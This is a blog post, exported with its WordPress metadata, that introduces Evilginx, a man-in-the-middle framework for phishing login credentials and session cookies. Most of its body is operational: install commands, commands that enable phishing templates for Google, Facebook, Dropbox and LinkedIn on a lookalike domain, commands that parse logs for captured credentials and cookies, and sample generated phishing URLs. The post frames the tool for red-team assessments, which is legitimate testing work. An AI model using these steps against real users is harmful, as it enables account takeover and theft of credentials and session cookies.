{"id":1701,"date":"2018-06-22T07:51:38","date_gmt":"2018-06-22T02:21:38","guid":{"rendered":"http:\/\/kalilinuxtutorials.com\/?p=1701"},"modified":"2018-06-22T07:51:38","modified_gmt":"2018-06-22T02:21:38","slug":"evilginx-mitm-attack","status":"publish","type":"post","link":"https:\/\/kalilinuxtutorials.com\/evilginx-mitm-attack\/","title":{"rendered":"Evilginx &#8211; MITM Attack Framework For Phishing Credentials &#038; Session Cookies"},"content":{"rendered":"<p><span class=\"col-11 text-gray-dark mr-2\">Evilginx is a Man-in-the-middle attack framework used for phishing credentials and session cookies of any web service. It&#8217;s core runs on Nginx HTTP server, which utilizes <code>proxy_pass<\/code> and <code>sub_filter<\/code> to proxy and modify HTTP content, while intercepting traffic between client and server.<\/span><\/p>\n<h2 style=\"text-align: center;\"><span style=\"color: #008000;\"><strong>Installing Evilginx<\/strong><\/span><\/h2>\n<p>Evilginx provides an installation script <code>install.sh<\/code> that takes care of installing the whole package on any Debian wheezy\/jessie machine, in fire and forget manner.<\/p>\n<p><strong><span class=\"td_btn td_btn_sm td_3D_btn\">Also Read<\/span>\u00a0<a href=\"https:\/\/kalilinuxtutorials.com\/ghost-phisher-wireless-attack\/\" target=\"_blank\" rel=\"noopener\">Ghost Phisher \u2013 Wireless &amp; Ethernet Attack Software Application<\/a><\/strong><\/p>\n<pre><span style=\"color: #008000;\"><strong><code><span style=\"color: #008000;\">git clone https:\/\/github.com\/kgretzky\/evilginx<\/span>\n<span style=\"color: #008000;\">cd evilginx\nchmod 700 install.sh\n.\/install.sh\n<\/span><\/code><\/strong><\/span><\/pre>\n<h2 style=\"text-align: center;\"><strong><span style=\"color: #008000;\">Usage<\/span><\/strong><\/h2>\n<pre><strong><span style=\"color: #008000;\"><code><span style=\"color: #008000;\">            _ _       _            \n           (_) |     (_)           \n  _____   ___| | __ _ _ _ __ __  __\n \/ _ \\ \\ \/ \/ | |\/ _` | | '_ \\\\ \\\/ \/\n|  __\/\\ V \/| | | (_| | | | | |&gt;  &lt; \n \\___| \\_\/ |_|_|\\__, |_|_| |_\/_\/\\_\\\n                 __\/ |            <\/span> \n <span style=\"color: #008000;\">by @mrgretzky  |___\/          v1.0\n\nusage: evilginx.py [-h] {setup,parse,genurl} ...<\/span>\n\n<span style=\"color: #008000;\">positional arguments:\n  {setup,parse,genurl}\n    setup               Configure Evilginx.\n    parse               Parse log file(s).\n    genurl              Generate phishing URL.\n\noptional arguments:\n  -h, --help            show this help message and exit\n<\/span><\/code><\/span><\/strong><\/pre>\n<h2 style=\"text-align: center;\"><span style=\"color: #008000;\"><strong>Setup<\/strong><\/span><\/h2>\n<p>Enable or disable site configurations for use with Nginx server, using supplied Evilginx templates from <code>sites<\/code> directory.<\/p>\n<pre><code><strong>usage: evilginx.py setup [-h] [-d DOMAIN] [-y]\n                         (-l | --enable ENABLE | --disable DISABLE)\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -d DOMAIN, --domain DOMAIN\n                        Your phishing domain.\n  -y                    Answer all questions with 'Yes'.\n  -l, --list            List available supported apps.\n  --enable ENABLE       Enable following site by name.\n  --disable DISABLE     Disable following site by name.\n<\/strong><\/code><\/pre>\n<p><strong>List available site configuration templates:<\/strong><\/p>\n<pre><code><strong>python evilginx.py setup -l<\/strong><\/code><\/pre>\n<p><strong>Listing available supported sites:<\/strong><br \/>\n<code><strong>- dropbox (\/root\/evilginx\/sites\/dropbox\/config)<br \/>\nsubdomains: www<br \/>\n<\/strong><br \/>\n<strong>- google (\/root\/evilginx\/sites\/google\/config)<br \/>\nsubdomains: accounts, ssl<br \/>\n<\/strong><br \/>\n<strong>- facebook (\/root\/evilginx\/sites\/facebook\/config)<br \/>\nsubdomains: www, m<br \/>\n<\/strong><br \/>\n<strong>- linkedin (\/root\/evilginx\/sites\/linkedin\/config)<br \/>\nsubdomains: www<\/strong><\/code><\/p>\n<p><strong>Enable google phishing site with preregistered phishing domain <\/strong><code><strong>not-really-google.com<\/strong><\/code><strong>:<\/strong><\/p>\n<pre><code><span style=\"color: #008000;\"><strong>python evilginx.py<\/strong><\/span> <strong><span style=\"color: #008000;\">setup --enable google -d not-really-google.com\n<\/span><\/strong><\/code><\/pre>\n<p><strong>Disable facebook phishing site:<\/strong><\/p>\n<pre><span style=\"color: #008000;\"><strong><code><span style=\"color: #008000;\">python evilginx.py<\/span> <span style=\"color: #008000;\">setup --disable facebook\n<\/span><\/code><\/strong><\/span><\/pre>\n<h3 style=\"text-align: center;\"><span style=\"color: #008000;\"><strong>Parse<\/strong><\/span><\/h3>\n<p>Parse Nginx logs to extract intercepted login credentials and session cookies. Logs, by default, are saved in <code>logs<\/code> directory, where <code>evilginx.py<\/code> script resides. This can be done automatically after you enable auto-parsing in the <strong>Setup<\/strong> phase.<\/p>\n<pre><strong><code><span style=\"color: #008000;\">usage: evilginx.py parse [-h] -s SITE [--debug]\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -s SITE, --site SITE  Name of site to parse logs for ('all' to parse logs\n                        for all sites).\n  --debug               Does not truncate log file after parsing.\n<\/span><\/code><\/strong><\/pre>\n<p><strong>Parse logs only for google site:<\/strong><\/p>\n<pre><code><strong><span style=\"color: #008000;\">python evilginx.py<\/span> <span style=\"color: #008000;\">parse -s google\n<\/span><\/strong><\/code><\/pre>\n<p><strong>Parse logs for all available sites:<\/strong><\/p>\n<pre><span style=\"color: #008000;\"><strong><code><span style=\"color: #008000;\">python evilginx.py<\/span> <span style=\"color: #008000;\">parse -s all\n<\/span><\/code><\/strong><\/span><\/pre>\n<h3 style=\"text-align: center;\"><strong>Generate URL<\/strong><\/h3>\n<p><strong>Generate phishing URLs that you can use in your Red Team Assessments.<\/strong><\/p>\n<pre><code><span style=\"color: #008000;\"><strong>usage: evilginx.py genurl [-h] -s SITE -r REDIRECT\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -s SITE, --site SITE  Name of site to generate link for.\n  -r REDIRECT, --redirect REDIRECT\n                        Redirect user to this URL after successful sign-in.\n<\/strong><\/span><\/code><\/pre>\n<div class=\"application-main \" role=\"main\">\n<div class=\"\">\n<div id=\"js-repo-pjax-container\" data-pjax-container=\"\">\n<div class=\"container new-discussion-timeline experiment-repo-nav \">\n<div class=\"repository-content \">\n<div id=\"readme\" class=\"readme boxed-group clearfix announce instapaper_body md\">\n<article class=\"markdown-body entry-content\"><strong>Generate google phishing URL that will redirect victim to rick&#8217;roll video on successful login:<\/strong><\/p>\n<pre><span style=\"color: #008000;\"><strong><code><span style=\"color: #008000;\">python evilginx.py genurl -s google<\/span> <span style=\"color: #008000;\">-r https:\/\/www.youtube.com\/watch?v=dQw4w9WgXcQ<\/span><\/code><\/strong><\/span><\/pre>\n<\/article>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<p><strong>Generated following phishing URLs:<\/strong><\/p>\n<ul>\n<li><strong><a href=\"https:\/\/accounts.not-really-google.com\/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ\" target=\"_blank\" rel=\"noopener\">https:\/\/accounts.not-really-google.com\/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ<\/a><\/strong><\/li>\n<li><a href=\"https:\/\/accounts.not-really-google.com\/signin\/v2\/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ\" target=\"_blank\" rel=\"noopener\"><strong>https:\/\/accounts.not-really-google.com\/signin\/v2\/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ<\/strong><\/a><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Evilginx is a Man-in-the-middle attack framework used for phishing credentials and session cookies of any web service. It&#8217;s core runs on Nginx HTTP server, which utilizes proxy_pass and sub_filter to proxy and modify HTTP content, while intercepting traffic between client and server. Installing Evilginx Evilginx provides an installation script install.sh that takes care of installing [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[28],"tags":[259,1095,2093,2501],"class_list":["post-1701","post","type-post","status-publish","format-standard","hentry","category-kali","tag-attack","tag-evilginx","tag-mitm","tag-phishing"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Evilginx - MITM Attack For Phishing Credentials &amp; Session Cookies<\/title>\n<meta name=\"description\" content=\"Evilginx is a Man-in-the-middle attack framework used for phishing credentials and session cookies of any web service. It&#039;s core runs on Nginx HTTP server\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kalilinuxtutorials.com\/evilginx-mitm-attack\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Evilginx - MITM Attack For Phishing Credentials &amp; Session Cookies\" \/>\n<meta property=\"og:description\" content=\"Evilginx is a Man-in-the-middle attack framework used for phishing credentials and session cookies of any web service. It&#039;s core runs on Nginx HTTP server\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kalilinuxtutorials.com\/evilginx-mitm-attack\/\" \/>\n<meta property=\"og:site_name\" content=\"Kali Linux Tutorials\" \/>\n<meta property=\"article:published_time\" content=\"2018-06-22T02:21:38+00:00\" \/>\n<meta name=\"author\" content=\"R K\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:site\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"R K\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/evilginx-mitm-attack\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/evilginx-mitm-attack\/\"},\"author\":{\"name\":\"R K\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\"},\"headline\":\"Evilginx &#8211; MITM Attack Framework For Phishing Credentials &#038; Session Cookies\",\"datePublished\":\"2018-06-22T02:21:38+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/evilginx-mitm-attack\/\"},\"wordCount\":250,\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"keywords\":[\"attack\",\"Evilginx\",\"MITM\",\"Phishing\"],\"articleSection\":[\"Kali Linux\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/evilginx-mitm-attack\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/evilginx-mitm-attack\/\",\"name\":\"Evilginx - MITM Attack For Phishing Credentials & Session Cookies\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\"},\"datePublished\":\"2018-06-22T02:21:38+00:00\",\"description\":\"Evilginx is a Man-in-the-middle attack framework used for phishing credentials and session cookies of any web service. It's core runs on Nginx HTTP server\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/evilginx-mitm-attack\/\"]}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"name\":\"Kali Linux Tutorials\",\"description\":\"Kali Linux Tutorials\",\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\",\"name\":\"Kali Linux Tutorials\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"contentUrl\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"width\":272,\"height\":90,\"caption\":\"Kali Linux Tutorials\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/CyberEdition\",\"https:\/\/www.threads.com\/@cybersecurityedition\",\"https:\/\/www.linkedin.com\/company\/cyberedition\",\"https:\/\/www.instagram.com\/cybersecurityedition\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad\",\"name\":\"R K\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g\",\"caption\":\"R K\"},\"url\":\"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Evilginx - MITM Attack For Phishing Credentials & Session Cookies","description":"Evilginx is a Man-in-the-middle attack framework used for phishing credentials and session cookies of any web service. It's core runs on Nginx HTTP server","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kalilinuxtutorials.com\/evilginx-mitm-attack\/","og_locale":"en_US","og_type":"article","og_title":"Evilginx - MITM Attack For Phishing Credentials & Session Cookies","og_description":"Evilginx is a Man-in-the-middle attack framework used for phishing credentials and session cookies of any web service. It's core runs on Nginx HTTP server","og_url":"https:\/\/kalilinuxtutorials.com\/evilginx-mitm-attack\/","og_site_name":"Kali Linux Tutorials","article_published_time":"2018-06-22T02:21:38+00:00","author":"R K","twitter_card":"summary_large_image","twitter_creator":"@CyberEdition","twitter_site":"@CyberEdition","twitter_misc":{"Written by":"R K","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/kalilinuxtutorials.com\/evilginx-mitm-attack\/#article","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/evilginx-mitm-attack\/"},"author":{"name":"R K","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad"},"headline":"Evilginx &#8211; MITM Attack Framework For Phishing Credentials &#038; Session Cookies","datePublished":"2018-06-22T02:21:38+00:00","mainEntityOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/evilginx-mitm-attack\/"},"wordCount":250,"publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"keywords":["attack","Evilginx","MITM","Phishing"],"articleSection":["Kali Linux"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/kalilinuxtutorials.com\/evilginx-mitm-attack\/","url":"https:\/\/kalilinuxtutorials.com\/evilginx-mitm-attack\/","name":"Evilginx - MITM Attack For Phishing Credentials & Session Cookies","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/#website"},"datePublished":"2018-06-22T02:21:38+00:00","description":"Evilginx is a Man-in-the-middle attack framework used for phishing credentials and session cookies of any web service. It's core runs on Nginx HTTP server","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/kalilinuxtutorials.com\/evilginx-mitm-attack\/"]}]},{"@type":"WebSite","@id":"https:\/\/kalilinuxtutorials.com\/#website","url":"https:\/\/kalilinuxtutorials.com\/","name":"Kali Linux Tutorials","description":"Kali Linux Tutorials","publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/kalilinuxtutorials.com\/#organization","name":"Kali Linux Tutorials","url":"https:\/\/kalilinuxtutorials.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/","url":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","contentUrl":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","width":272,"height":90,"caption":"Kali Linux Tutorials"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/CyberEdition","https:\/\/www.threads.com\/@cybersecurityedition","https:\/\/www.linkedin.com\/company\/cyberedition","https:\/\/www.instagram.com\/cybersecurityedition\/"]},{"@type":"Person","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/69444b58b9e267a4cf08fceb34b6f6ad","name":"R K","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d3937c9687f2da11bc0a716404ff91779fe19ca115208dbf66167ad353aca5aa?s=96&d=mm&r=g","caption":"R K"},"url":"https:\/\/kalilinuxtutorials.com\/author\/ranjith\/"}]}},"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":3063,"url":"https:\/\/kalilinuxtutorials.com\/evilginx2-mitm-attack\/","url_meta":{"origin":1701,"position":0},"title":"Evilginx2 &#8211; Standalone MITM Attack Framework Used For Phishing Login Credentials Along With Session Cookies, Allowing For The Bypass Of 2-factor Authentication","author":"R K","date":"October 30, 2018","format":false,"excerpt":"Evilginx2 is a man-in-the-middle attack framework used for phishing login credentials along with session cookies, which in turn allows to bypass 2-factor authentication protection. This tool is a successor to Evilginx, released in 2017, which used a custom version of nginx HTTP server to provide man-in-the-middle functionality to act as\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2018\/04\/button_download.png?resize=350%2C200&ssl=1","width":350,"height":200},"classes":[]},{"id":3560,"url":"https:\/\/kalilinuxtutorials.com\/evilginx2-man-in-the-middle-attack\/","url_meta":{"origin":1701,"position":1},"title":"Evilginx2 : Standalone Man-In-The-Middle Attack Framework","author":"R K","date":"January 16, 2019","format":false,"excerpt":"Evilginx2 is a man-in-the-middle attack framework used for phishing login credentials along with session cookies, which in turn allows to bypass 2-factor authentication protection. This tool is a successor to Evilginx, released in 2017, which used a custom version of nginx HTTP server to provide man-in-the-middle functionality to act as\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":31937,"url":"https:\/\/kalilinuxtutorials.com\/frameless-bitb\/","url_meta":{"origin":1701,"position":2},"title":"Frameless BITB &#8211; A New Approach To Phishing Attacks","author":"Varshini","date":"February 5, 2024","format":false,"excerpt":"A new approach to Browser In The Browser (BITB) without the use of iframes, allowing the bypass of traditional framebusters implemented by login pages like Microsoft. This POC code is built for using this new BITB with Evilginx, and a Microsoft Enterprise phishlet. Before diving deep into this, I recommend\u2026","rel":"","context":"In &quot;Cyber security&quot;","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgrIkx5iB5QHFPz9iC-AvFCu3HugQjUE_OrByj3V3oU7OPPIAvcoJSbAO73UEsxsJbBpc9-0Rcf7Ie49xWRPhMNTE8BrhaQQqNLo4JwBQyDyyMG3JF7X-xm-uKHJIlHH58XUC1OIb3PTudUXX4kpfgkxgaS0rMULmNZ3zZ0BBY6JpBBZbFdv2nMunzMR0fi\/s16000\/Untitled%20design%20%2816%29.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgrIkx5iB5QHFPz9iC-AvFCu3HugQjUE_OrByj3V3oU7OPPIAvcoJSbAO73UEsxsJbBpc9-0Rcf7Ie49xWRPhMNTE8BrhaQQqNLo4JwBQyDyyMG3JF7X-xm-uKHJIlHH58XUC1OIb3PTudUXX4kpfgkxgaS0rMULmNZ3zZ0BBY6JpBBZbFdv2nMunzMR0fi\/s16000\/Untitled%20design%20%2816%29.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgrIkx5iB5QHFPz9iC-AvFCu3HugQjUE_OrByj3V3oU7OPPIAvcoJSbAO73UEsxsJbBpc9-0Rcf7Ie49xWRPhMNTE8BrhaQQqNLo4JwBQyDyyMG3JF7X-xm-uKHJIlHH58XUC1OIb3PTudUXX4kpfgkxgaS0rMULmNZ3zZ0BBY6JpBBZbFdv2nMunzMR0fi\/s16000\/Untitled%20design%20%2816%29.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgrIkx5iB5QHFPz9iC-AvFCu3HugQjUE_OrByj3V3oU7OPPIAvcoJSbAO73UEsxsJbBpc9-0Rcf7Ie49xWRPhMNTE8BrhaQQqNLo4JwBQyDyyMG3JF7X-xm-uKHJIlHH58XUC1OIb3PTudUXX4kpfgkxgaS0rMULmNZ3zZ0BBY6JpBBZbFdv2nMunzMR0fi\/s16000\/Untitled%20design%20%2816%29.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgrIkx5iB5QHFPz9iC-AvFCu3HugQjUE_OrByj3V3oU7OPPIAvcoJSbAO73UEsxsJbBpc9-0Rcf7Ie49xWRPhMNTE8BrhaQQqNLo4JwBQyDyyMG3JF7X-xm-uKHJIlHH58XUC1OIb3PTudUXX4kpfgkxgaS0rMULmNZ3zZ0BBY6JpBBZbFdv2nMunzMR0fi\/s16000\/Untitled%20design%20%2816%29.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgrIkx5iB5QHFPz9iC-AvFCu3HugQjUE_OrByj3V3oU7OPPIAvcoJSbAO73UEsxsJbBpc9-0Rcf7Ie49xWRPhMNTE8BrhaQQqNLo4JwBQyDyyMG3JF7X-xm-uKHJIlHH58XUC1OIb3PTudUXX4kpfgkxgaS0rMULmNZ3zZ0BBY6JpBBZbFdv2nMunzMR0fi\/s16000\/Untitled%20design%20%2816%29.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":1706,"url":"https:\/\/kalilinuxtutorials.com\/overthruster-hid-attack-arduinos\/","url_meta":{"origin":1701,"position":3},"title":"OverThruster &#8211; HID Attack Payload Generator For Arduinos","author":"R K","date":"June 23, 2018","format":false,"excerpt":"OverThruster is a tool to generate sketches for Arduinos when used as an HID Attack. It was designed around devices with the ATMEGA32U4 chip, like the CJMCU-BEETLE, or the new LilyGo \"BadUSB\" devices popping up on ebay and aliexpress that look like USB sticks but contain an Arduino. I wrote\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2018\/04\/button_download.png?resize=350%2C200&ssl=1","width":350,"height":200},"classes":[]},{"id":33360,"url":"https:\/\/kalilinuxtutorials.com\/phishing-engagement-infrastructure-setup-guide\/","url_meta":{"origin":1701,"position":4},"title":"Phishing Engagement Infrastructure Setup Guide","author":"Varshini","date":"June 14, 2024","format":false,"excerpt":"The essential steps and strategies for setting up a robust phishing engagement infrastructure. From acquiring and categorizing domains to automating your phishing efforts, this article provides practical insights and resources for building effective phishing campaigns. We also delve into innovative methods for email delivery that bypass common security filters, ensuring\u2026","rel":"","context":"In &quot;Phishing&quot;","block_context":{"text":"Phishing","link":"https:\/\/kalilinuxtutorials.com\/category\/phishing\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhSMWc6ILejeKSz_1rEi6_9BxZNRzbtcLGDAg6Ol2iGnbzM23a1t2lGtESaftwR1f1rVKCoNz5GvVF5yV6j0GHu1GqlHdYWbZpltATTtOuxgQwGk6GMDo2U5NqUmU_my2vPm3gASiiSMT0_JrwxMebospdDhkNDlPwfDaoxQ1_C2AUJEO2mZSm-8ylGk2eR\/s16000\/SharePoint%20XXE%20Injection%20Vulnerability.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhSMWc6ILejeKSz_1rEi6_9BxZNRzbtcLGDAg6Ol2iGnbzM23a1t2lGtESaftwR1f1rVKCoNz5GvVF5yV6j0GHu1GqlHdYWbZpltATTtOuxgQwGk6GMDo2U5NqUmU_my2vPm3gASiiSMT0_JrwxMebospdDhkNDlPwfDaoxQ1_C2AUJEO2mZSm-8ylGk2eR\/s16000\/SharePoint%20XXE%20Injection%20Vulnerability.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhSMWc6ILejeKSz_1rEi6_9BxZNRzbtcLGDAg6Ol2iGnbzM23a1t2lGtESaftwR1f1rVKCoNz5GvVF5yV6j0GHu1GqlHdYWbZpltATTtOuxgQwGk6GMDo2U5NqUmU_my2vPm3gASiiSMT0_JrwxMebospdDhkNDlPwfDaoxQ1_C2AUJEO2mZSm-8ylGk2eR\/s16000\/SharePoint%20XXE%20Injection%20Vulnerability.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhSMWc6ILejeKSz_1rEi6_9BxZNRzbtcLGDAg6Ol2iGnbzM23a1t2lGtESaftwR1f1rVKCoNz5GvVF5yV6j0GHu1GqlHdYWbZpltATTtOuxgQwGk6GMDo2U5NqUmU_my2vPm3gASiiSMT0_JrwxMebospdDhkNDlPwfDaoxQ1_C2AUJEO2mZSm-8ylGk2eR\/s16000\/SharePoint%20XXE%20Injection%20Vulnerability.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhSMWc6ILejeKSz_1rEi6_9BxZNRzbtcLGDAg6Ol2iGnbzM23a1t2lGtESaftwR1f1rVKCoNz5GvVF5yV6j0GHu1GqlHdYWbZpltATTtOuxgQwGk6GMDo2U5NqUmU_my2vPm3gASiiSMT0_JrwxMebospdDhkNDlPwfDaoxQ1_C2AUJEO2mZSm-8ylGk2eR\/s16000\/SharePoint%20XXE%20Injection%20Vulnerability.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhSMWc6ILejeKSz_1rEi6_9BxZNRzbtcLGDAg6Ol2iGnbzM23a1t2lGtESaftwR1f1rVKCoNz5GvVF5yV6j0GHu1GqlHdYWbZpltATTtOuxgQwGk6GMDo2U5NqUmU_my2vPm3gASiiSMT0_JrwxMebospdDhkNDlPwfDaoxQ1_C2AUJEO2mZSm-8ylGk2eR\/s16000\/SharePoint%20XXE%20Injection%20Vulnerability.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":31276,"url":"https:\/\/kalilinuxtutorials.com\/awesome-bec\/","url_meta":{"origin":1701,"position":5},"title":"Awesome-BEC &#8211; Unveiling A Comprehensive Resource For Business Email Compromise Investigations","author":"Varshini","date":"November 14, 2023","format":false,"excerpt":"A Comprehensive Resource for Business Email Compromise Investigations.' In the ever-evolving landscape of cyber threats, 